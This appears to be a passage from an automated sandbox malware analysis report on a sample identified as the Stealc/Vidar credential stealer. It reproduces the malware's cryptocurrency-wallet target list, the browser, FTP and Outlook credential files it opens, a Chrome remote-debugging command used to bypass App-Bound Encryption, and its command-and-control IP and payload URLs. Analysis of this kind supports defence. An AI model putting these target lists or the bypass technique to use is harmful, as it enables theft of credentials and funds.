Storage\leveldb\|*.*|0|
Source: gYjK72gL17.exe, 00000000.00000002.2605632956.0000000000275000.00000004.00000001.01000000.00000003.sdmp String found in binary or memory: exodus.conf.json
Source: gYjK72gL17.exe, 00000000.00000002.2605632956.0000000000275000.00000004.00000001.01000000.00000003.sdmp String found in binary or memory: \Exodus\
Source: gYjK72gL17.exe, 00000000.00000002.2605632956.0000000000244000.00000004.00000001.01000000.00000003.sdmp String found in binary or memory: allet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: gYjK72gL17.exe, 00000000.00000002.2605632956.0000000000275000.00000004.00000001.01000000.00000003.sdmp String found in binary or memory: ElectrumLTC
Source: gYjK72gL17.exe, 00000000.00000002.2605632956.0000000000244000.00000004.00000001.01000000.00000003.sdmp String found in binary or memory: allet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: gYjK72gL17.exe, 00000000.00000002.2605632956.0000000000244000.00000004.00000001.01000000.00000003.sdmp String found in binary or memory: allet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: gYjK72gL17.exe, 00000000.00000002.2605632956.0000000000275000.00000004.00000001.01000000.00000003.sdmp String found in binary or memory: \Ethereum\
Source: gYjK72gL17.exe, 00000000.00000002.2605632956.0000000000275000.00000004.00000001.01000000.00000003.sdmp String found in binary or memory: Exodus
Source: gYjK72gL17.exe, 00000000.00000002.2607101722.0000000001586000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Binance\.finger-print.fp
Source: gYjK72gL17.exe, 00000000.00000002.2605632956.0000000000275000.00000004.00000001.01000000.00000003.sdmp String found in binary or memory: Ethereum
Source: gYjK72gL17.exe, 00000000.00000002.2605632956.0000000000244000.00000004.00000001.01000000.00000003.sdmp String found in binary or memory: allet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: gYjK72gL17.exe, 00000000.00000002.2605632956.0000000000327000.00000004.00000001.01000000.00000003.sdmp String found in binary or memory: \Coinomi\Coinomi\wallets\
Source: gYjK72gL17.exe, 00000000.00000002.2605632956.0000000000244000.00000004.00000001.01000000.00000003.sdmp String found in binary or memory: allet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: gYjK72gL17.exe, 00000000.00000002.2605632956.0000000000244000.00000004.00000001.01000000.00000003.sdmp String found in binary or memory: allet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: gYjK72gL17.exe, 00000000.00000002.2605632956.0000000000244000.00000004.00000001.01000000.00000003.sdmp String found in binary or memory: allet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: gYjK72gL17.exe, 00000000.00000002.2605632956.0000000000275000.00000004.00000001.01000000.00000003.sdmp String found in binary or memory: keystore
Source: gYjK72gL17.exe, 00000000.00000002.2605632956.0000000000275000.00000004.00000001.01000000.00000003.sdmp String found in binary or memory: \Electrum-LTC\wallets\
Source: gYjK72gL17.exe, 00000000.00000002.2607101722.0000000001586000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\*.*
Tries to harvest and steal Bitcoin Wallet information
Source: C:\Users\user\Desktop\gYjK72gL17.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core Jump to behavior
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\Desktop\gYjK72gL17.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite-wal Jump to behavior
Source: C:\Users\user\Desktop\gYjK72gL17.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\prefs.js Jump to behavior
Source: C:\Users\user\Desktop\gYjK72gL17.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite-shm Jump to behavior
Source: C:\Users\user\Desktop\gYjK72gL17.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\gYjK72gL17.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Users\user\Desktop\gYjK72gL17.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite Jump to behavior
Source: C:\Users\user\Desktop\gYjK72gL17.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite-wal Jump to behavior
Source: C:\Users\user\Desktop\gYjK72gL17.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite Jump to behavior
Source: C:\Users\user\Desktop\gYjK72gL17.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History-journal Jump to behavior
Source: C:\Users\user\Desktop\gYjK72gL17.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\gYjK72gL17.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite-shm Jump to behavior
Source: C:\Users\user\Desktop\gYjK72gL17.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History Jump to behavior
Source: C:\Users\user\Desktop\gYjK72gL17.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History Jump to behavior
Tries to harvest and steal ftp login credentials
Source: C:\Users\user\Desktop\gYjK72gL17.exe File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml Jump to behavior
Tries to steal Crypto Currency Wallets
Source: C:\Users\user\Desktop\gYjK72gL17.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\gYjK72gL17.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\gYjK72gL17.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\gYjK72gL17.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\gYjK72gL17.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\gYjK72gL17.exe File opened: C:\Users\user\AppData\Roaming\Exodus\ Jump to behavior
Source: C:\Users\user\Desktop\gYjK72gL17.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\ Jump to behavior
Source: C:\Users\user\Desktop\gYjK72gL17.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\ Jump to behavior
Source: C:\Users\user\Desktop\gYjK72gL17.exe File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\gYjK72gL17.exe File opened: C:\Users\user\AppData\Roaming\MultiDoge\ Jump to behavior
Source: C:\Users\user\Desktop\gYjK72gL17.exe File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\ Jump to behavior
Source: C:\Users\user\Desktop\gYjK72gL17.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\ Jump to behavior
Source: C:\Users\user\Desktop\gYjK72gL17.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\ Jump to behavior
Source: C:\Users\user\Desktop\gYjK72gL17.exe File opened: C:\Users\user\AppData\Roaming\Binance\ Jump to behavior
Source: C:\Users\user\Desktop\gYjK72gL17.exe File opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\gYjK72gL17.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\ Jump to behavior
Source: C:\Users\user\Desktop\gYjK72gL17.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\ Jump to behavior
Source: C:\Users\user\Desktop\gYjK72gL17.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\ Jump to behavior
Source: C:\Users\user\Desktop\gYjK72gL17.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\ Jump to behavior
Source: C:\Users\user\Desktop\gYjK72gL17.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\ Jump to behavior
Source: C:\Users\user\Desktop\gYjK72gL17.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\ Jump to behavior
Source: C:\Users\user\Desktop\gYjK72gL17.exe File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\ Jump to behavior
Tries to steal Mail credentials (via file / registry access)
Source: C:\Users\user\Desktop\gYjK72gL17.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 Jump to behavior
Source: C:\Users\user\Desktop\gYjK72gL17.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 Jump to behavior
Source: C:\Users\user\Desktop\gYjK72gL17.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 Jump to behavior
Source: C:\Users\user\Desktop\gYjK72gL17.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004 Jump to behavior
Yara detected Credential Stealer
Source: Yara match File source: 0.2.gYjK72gL17.exe.1c0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.2605632956.0000000000294000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: gYjK72gL17.exe PID: 4512, type: MEMORYSTR

Remote Access Functionality
barindex
Attempt to bypass Chrome Application-Bound Encryption
Source: C:\Users\user\Desktop\gYjK72gL17.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
Yara detected Stealc
Source: Yara match File source: 0.2.gYjK72gL17.exe.1c0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.2607101722.0000000001527000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2605576671.00000000001EB000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: gYjK72gL17.exe PID: 4512, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
Yara detected Vidar stealer
Source: Yara match File source: Process Memory Space: gYjK72gL17.exe PID: 4512, type: MEMORYSTR
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 1580418 Sample: gYjK72gL17.exe Startdate: 24/12/2024 Architecture: WINDOWS Score: 100 49 Suricata IDS alerts for network traffic 2->49 51 Found malware configuration 2->51 53 Malicious sample detected (through community Yara rule) 2->53 55 8 other signatures 2->55 7 gYjK72gL17.exe 33 2->7         started        12 msedge.exe 9 2->12         started        process3 dnsIp4 39 185.231.69.191, 49709, 49748, 49787 ON-LINE-DATAServerlocation-NetherlandsDrontenNL Ukraine 7->39 41 127.0.0.1 unknown unknown 7->41 27 C:\Users\user\AppData\...\vcruntime140[1].dll, PE32 7->27 dropped 29 C:\Users\user\AppData\...\softokn3[1].dll, PE32 7->29 dropped 31 C:\Users\user\AppData\Local\...\nss3[1].dll, PE32 7->31 dropped 33 9 other files (none is malicious) 7->33 dropped 57 Attempt to bypass Chrome Application-Bound Encryption 7->57 59 Overwrites code with unconditional jumps - possibly settings hooks in foreign process 7->59 61 Tries to steal Mail credentials (via file / registry access) 7->61 63 6 other signatures 7->63 14 msedge.exe 2 10 7->14         started        17 chrome.exe 7->17         started        20 msedge.exe 12->20         started        file5 signatures6 process7 dnsIp8 65 Monitors registry run keys for changes 14->65 22 msedge.exe 14->22         started        35 192.168.2.6, 443, 49419, 49700 unknown unknown 17->35 37 239.255.255.250 unknown Reserved 17->37 24 chrome.exe 17->24         started        signatures9 process10 dnsIp11 43 www.google.com 142.250.181.68, 443, 49712, 49713 GOOGLEUS United States 24->43 45 plus.l.google.com 24->45 47 apis.google.com 24->47
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
185.231.69.191
 unknown Ukraine
204601 ON-LINE-DATAServerlocation-NetherlandsDrontenNL true
239.255.255.250
 unknown Reserved
unknown unknown false
142.250.181.68
 www.google.com United States
15169 GOOGLEUS false

Private

IP
192.168.2.6
127.0.0.1

Contacted Domains

Name IP Active
plus.l.google.com 172.217.17.46 true
www.google.com 142.250.181.68 true
apis.google.com unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://185.231.69.191/ec05bb5a9eb90166/mozglue.dll true
  • Avira URL Cloud: safe
 unknown
http://185.231.69.191/ true
  • Avira URL Cloud: safe
 unknown
http://185.231.69.191/ec05bb5a9eb90166/nss3.dll true
  • Avira URL Cloud: safe
 unknown
http://185.231.69.191/ec05bb5a9eb90166/softokn3.dll true
  • Avira URL Cloud: safe
 unknown
https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0 false
    		high
    http://185.231.69.191/ec05bb5a9eb90166/msvcp140.dll true
    • Avira URL Cloud: safe
    		 unknown
    185.231.69.191/f190e2808a5419c3.php true
    • Avira URL Cloud: malware
    		 unknown
    http://185.231.69.191/ec05bb5a9eb90166/sqlite3.dll true
    • Avira URL Cloud: safe
    		 unknown
    https://www.google.com/async/newtab_promos false
      		high
      http://185.231.69.191/ec05bb5a9eb90166/freebl3.dll true
      • Avira URL Cloud: safe
      		 unknown
      https://www.google.com/async/ddljson?async=ntp:2 false
        		high
        http://185.231.69.191/ec05bb5a9eb90166/vcruntime140.dll true
        • Avira URL Cloud: safe
        		 unknown
